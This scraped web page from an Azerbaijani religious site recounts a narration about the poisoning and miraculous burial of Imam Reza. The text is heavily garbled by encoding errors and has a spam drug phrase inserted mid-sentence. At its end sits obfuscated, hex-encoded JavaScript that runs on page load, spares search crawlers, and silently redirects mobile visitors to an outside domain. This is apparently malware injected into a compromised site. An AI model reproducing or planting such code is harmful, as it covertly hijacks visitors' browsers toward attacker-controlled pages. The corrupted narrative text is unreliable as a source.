INILIFE.RU
Son xəbərlər
Əsas səhifə / İslam / Hədislər / Əhlibeyt (ə) / A�mam RzanA�n (E�) A?rE�kparA�alayan AYE�hadE�t tarixi

A�mam RzanA�n (E�) A?rE�kparA�alayan AYE�hadE�t tarixi

??ba SE�lE�t HE�rE�vi nE�ql edir: a�?ME�n HE�zr02884E�t RzanA�n (E�) xidmE�tindE� idim. ME�nE� buyurdu: a�?Ey ??ba SE�lE�t! Harunun qE�bri olan qA?bbE�yE� daxil ol vE� onun dA�rd tE�rE�findE�n torpaq gA�tA?r vE� gE�la�?. Getdim vE� buyurduAYu torpaAYA� gE�tirdim.

A�mam (E�) bu torpaqlarA� iylE�di vE� buyurdu: a�?ME�ni Harunun arxasA�nda dE�fn etmE�k istE�yirlE�r. Ancaq orada elE� bir daAY var ki, bA?tA?n XorasanA�n kA?lA?nglE�rini gE�tirsE�lE�r dE�, onu yara bilmE�yE�cE�klE�ra�?. Bu sA�zlE�ri Harunun qE�birinin yuxarA�sA� vE� aAYaAYA�sA� haqqA�nda sA�ylE�di.

O zaman Harunun qE�birinin baAY tE�rE�findE�, yE�ni qiblE� tE�rE�findE� olan torpaAYA� iylE�di, buyurdu: a�?Bu torpaq mE�nim qE�birimin yeridir. Ey ??ba SE�lE�t! O zaman ki, mE�nim qE�brim zahir olacaq (qazA�lan zaman) orada bir rA?tubE�t olacaqdA�r. ME�n sE�nE� bir dua tE�lim edE�cE�yE�m ki, onu oxuyan zaman qE�brim su ilE� dolacaqdA�r. Bu suda kiA�ik balA�qlar gA�rA?nmE�yE� baAYlayacaqdA�r. SE�nE� verE�cE�yim A�A�rE�yi onlar A?A�A?n xA�rdala vE� onlar bu A�A�rE�yi yeyE�cE�klE�r. Sonra bA�yA?k bir balA�q zahir olacaq vE� hE�min kiA�ik balA�qlarA�n hamA�sA�nA� udacaqdA�r. Sonra qeyb olacaqdA�r. Bu zaman E�lini suya sal vE� sE�nE� A�yrE�dE�cE�yim duanA� oxu. Suyun hamA�sA� yerE� hopacaq vE� bA?tA?n bu iAYlE�ri ME�munun yanA�nda gA�ra�?.

Sonra buyurdu: a�?Ey ??ba SE�lE�t! ME�n sabah bu gA?nahkar insanA�n yanA�na gedE�cE�yE�m. Onun yanA�ndan A�A�xan zaman E�gE�r baAYA�mA� E�ba ilE� A�rtsE�m, mE�nimlE� danA�AYma vE� bil ki, mE�ni zE�hE�rlE�yibdira�?.

SabahA�sA� gA?nA?n sE�hE�ri A�mam (E�) intizar iA�E�risindE� E�ylE�AYmiAYdi. Bir mA?ddE�tdE�n sonra ME�mun nA�kE�rini gA�ndE�rir ki, A�mamA� (E�) yanA�na aparsA�n. A�mam (E�) ME�munun mE�clisinE� gedir vE� mE�n dE� onun ardA�nca getdim. Onun qabaAYA�na iA�E�risindE� xurma vE� mA?xtE�lif meyvE�lE�r olan qab qoymuAYdular. ME�munun A�zA? orada olan A?zA?mdE�n bir neA�E�sini yemiAYdi. A�mamA� (E�) gA�rE�n kimi ayaAYa qalxdA� vE� onu qucaqladA�. AlnA�ndan A�pA?b, yanA�nda E�ylE�AYdirdi. Sonra hE�min A?zA?mA? A�mama (E�) tE�klif etdi vE� dedi: a�?ME�n bu A?zA?mdE�n yaxAYA�sA�nA� gA�rmE�miAYE�ma�?.

A�mam (E�) buyurdu: a�?BehiAYt A?zA?mlE�ri daha yaxAYA�dA�ra�?.

ME�mun dedi: a�?Bu A?zA?mdE�n yeyina�?.

A�mam (E�) buyurdu: a�?ME�ni A?zrlA? bila�?.

ME�mun dedi: a�?HeA� bir A�arE�niz yoxdur, yoxsa bizi ittiham edirsiniz? Yox, mA?tlE�q yemE�lisiniza�?. Sonra A�zA? hE�min A?zA?mlE�rdE�n birini qoparA�b yedi vE� qalanA�nA� A�mama (E�) verdi.

A�mam (E�) o A?zA?mdE�n A?A� dE�nE� yedi vE� onu yerE� qoyub, dE�rhal ayaAYa qalxdA�.

ME�mun dedi: a�?Hara gedirsE�n?a�?.

A�mam (E�) buyurdu: O yerE� ki, mE�ni gA�ndE�rirsE�n.

Sonra E�basA�nA� baAYA�na saldA�, evinE� getdi vE� mE�nE� buyurdu ki, qapA�nA� baAYlayA�m.

ME�n evin ortasA�nda nigaran vE� pE�riAYan halda dayanmA�AYdA�m. Sonra gA�rdA?m ki, bir gA�zE�l simalA� cavan gE�ldi vE� o, A�mam Rzaya (E�) A�ox bE�nzE�yirdi. QabaAYa getdim vE� dedim: a�?Haradan gE�ldiniz? AxA� qapA�lar baAYlA�dA�r? Siz kimsiniz?a�?.

Buyurdu: a�?ME�n AllahA�n sE�nin A?zE�rindE� olan hA?ccE�tiyE�m. Ey ??ba SE�lE�t! ME�n MuhE�mmE�d ibni ??li Cavadam (E�)a�?. Sonra atasA�na tE�rE�f getdi vE� mE�nE� buyurdu ki, sE�n dE� gE�l.

A�mam RzanA�n (E�) gA�zA? oAYluna sataAYan kimi onu qucaqladA� vE� alnA�ndan A�pdA?. Sonra yavaAY danA�AYmaAYa baAYladA�lar vE� mE�n heA� nE� eAYitmE�dim. OnlarA�n bu sirli sA�hbE�ti A�mam (E�) ruhunu tapAYA�rana qE�dE�r davam etdi.

A�mam Cavad (E�) buyurdu: a�?Ey ??ba SE�lE�t! Get, qA?sl A?A�A?n lazA�m olanlarA� gE�tira�?. OnlarA� gE�tirdim vE� A�mama (E�) qA?sl vermE�k A?A�A?n qollarA�mA� A�A�rmaladA�m. HE�zrE�t Cavad (E�) buyurdu: a�?Ey ??ba SE�lE�t! KE�nara A�E�kil! ME�nE� kA�mE�k edE�n sE�ndE�n baAYqasA�dA�ra�?. Sonra E�ziz atasA�na qA?sl verdi vE� buyurdu: a�?Anbarda zE�nbil var ki, orada kE�fE�n vE� kafur var, onu gE�tira�?. ME�n getdim vE� buyurduqlarA� AYeylE�ri gE�tirdim.

HE�zrE�t Cavad (E�) onu kE�fE�nlE�di vE� namaz qA�ldA�. Sonra buyurdu: a�?Tabutu gE�tir. Anbarda vara�?. Anbara getdim vE� gA�rdA?m ki, orada tabut da var. A�mam (E�) atasA�nA� tabuta qoydu.

A�mam (E�) namaz qA�lmaAYa baAYladA� vE� hE�lE� namazA� baAYa A�atmamA�AYdA� ki, gA�rdA?m evin damA� aA�A�ldA�. GA�rdA?m ki, bu tabut sE�maya qalxdA� vE� mE�n dedim: a�?Ya ibn RE�sullah! A�ndi ME�mun gE�lE�cE�k vE� deyE�cE�k ki, A�mam RzanA�n (E�) mA?barE�k bE�dE�ni haradadA�r?a�?.

Buyurdu: a�?Aram ol! Bu mA?barE�k bE�dE�n tezliklE� qayA�dacaqdA�r. Ey ??ba SE�lE�t! ElE� bir peyAYE�mbE�r yoxdur ki, dA?nyanA�n AYE�rqindE� A�lsA?n vE� Allah ruhu vE� cE�sE�dini vE�siyinE� qovuAYdurmasA�n, hE�tta vE�siyi qE�rbdE� olsa belE�a�?. Bu zaman damA�n A?stA? yenE� aA�A�ldA� vE� tabut yerE� endi.

Sonra A�mam (E�) atasA�nA�n mA?barE�k cE�nazE�sini gA�tA?rdA? vE� yataAYA�na qoydu. Sanki nE� qA?sl olub vE� nE� dE� kE�fE�nlE�nmiAYdir. Sonra buyurdu: a�?Ey ??ba SE�lE�t! Qalx vE� qapA�nA� ME�mun A?A�A?n aA�!a�?.

BirdE�n ME�mun qapA�dan nA�kE�rlE�ri ilE� bir yerdE� aAYlayaraq daxil oldu. BaAYA�na dA�yA?rdA? vE� A�mamA�n (E�) mA?barE�k bE�dininin yanA�nda oturdu. A�mamA� (E�) dE�fn etmE�k A?A�A?n E�mr verdi.

A�mamA�n (E�) mE�nE� buyurduqlarA�nA�n hamA�sA� hE�yata keA�di. ME�mun (lE�n) dedi: a�?Biz HE�zrE�t Rza (E�) saAY olan zaman ondan A�oxlu kE�ramE�t gA�rmA?AYdA?k, indi A�lE�n zaman da o, kE�ramE�tlE�ri bizE� gA�stE�rira�?.

ME�munun vE�ziri ona deyir: a�?BaAYa dA?AYdA?nA?z, A�mam Rza sizE� nE�yi gA�stE�rmE�k istE�yirdi?a�?.

Dedi: a�?Yoxa�?.

Dedi: a�?O, bizE� bu kiA�ik vE� o bA�yA?k balA�AYA� gA�stE�rE�rE�k demE�k istE�yirdi ki, siz BE�ni-AbbasA�n sE�ltE�nE�ti bu qE�dE�r uzun mA?ddE�t olmasA�na baxmayaraq, kiA�ik balA�qlar kimidir. Sizin E�cE�liniz A�atan zaman Allah doxycline price increase. biz ??hli-beytdE�n (E�) olan bir nE�fE�ri sizE� hakim edE�cE�kdir vE� sizin hamA�nA�zA� aradan qaldA�racaqdA�r.

ME�mun dedi: a�?DA?z deyirsE�na�?.

Sonra ME�mun mE�nE� dedi: a�?O nE� dua idi ki, oxudun?a�?.

Dedim: a�?Allaha and olsun ki, hE�min an yadA�mdan A�A�xdA�a�?. HE�qiqE�tE�n dE� unutmuAYdum.

Ancaq ME�mun mE�ni hE�bs etdi vE� bir il zindanda qaldA�m. Bir gecE� sE�hE�rE� qE�dE�r dua etdim vE� AllahA� MuhE�mmE�d (s) vE� Ali-MuhE�mmE�dE� (E�) and verdim. Bu zaman HE�zrE�t Cavad (E�) zindana daxil oldu. Buyurdu: a�?Ey ??ba SE�lE�t! A?rE�yin darA�xA�r?a�? Dedim: a�?Allaha and olsun ki, bE�lia�?. Buyurdu: a�?AyaAYa qalxa�?. AyaAYA�mdakA� zE�nciri aA�dA� vE� mE�ni zindandan azad etdi. Zindanbanlar mE�ni gA�rA?rdA?lE�r, ancaq bir AYey etmirdilE�r. Buyurdu: a�?Get, Allah amanA�nda ol, ME�munun E�li bir dE� sE�nE� A�atmayacaqdA�ra�?. O gA?ndE�n sonra bir daha ME�munu gA�rmE�dima�?.(deyerler.org)

A�xacmazmescidi.com

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Scroll To Top